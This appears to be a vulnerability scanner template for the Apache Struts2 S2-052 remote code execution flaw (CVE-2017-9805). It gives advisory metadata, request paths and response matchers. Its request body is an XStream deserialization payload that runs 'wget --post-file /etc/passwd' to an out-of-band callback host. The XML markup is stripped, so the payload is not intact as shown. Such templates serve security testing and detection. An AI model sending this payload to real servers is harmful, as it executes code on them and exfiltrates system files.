id: CVE-2017-9805 info: name: Apache Struts2 S2-052 - Remote Code Execution author: pikpikcu severity: high description: The REST Plugin in Apache Struts 2.1.1 through 2.3.x before 2.3.34 and 2.5.x before 2.5.13 uses an XStreamHandler with an instance of XStream for deserialization without any type of filtering, which can lead to remote code execution when deserializing XML payloads. reference: - http://www.oracle.com/technetwork/security-advisory/alert-cve-2017-9805-3889403.html - https://struts.apache.org/docs/s2-052.html - https://nvd.nist.gov/vuln/detail/CVE-2017-9805 classification: cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.1 cve-id: CVE-2017-9805 cwe-id: CWE-502 tags: cve,cve2017,apache,rce,struts,kev requests: - method: POST path: - "{{BaseURL}}/struts2-rest-showcase/orders/3" - "{{BaseURL}}/orders/3" headers: Content-Type: application/xml body: | 0 false 0 wget --post-file /etc/passwd {{interactsh-url}} false java.lang.ProcessBuilder start asdasd asdasd false 0 0 false false 0 matchers-condition: and matchers: - type: word words: - "Debugging information" - "com.thoughtworks.xstream.converters.collections.MapConverter" condition: and - type: status status: - 500 # Enhanced by mp on 2022/04/20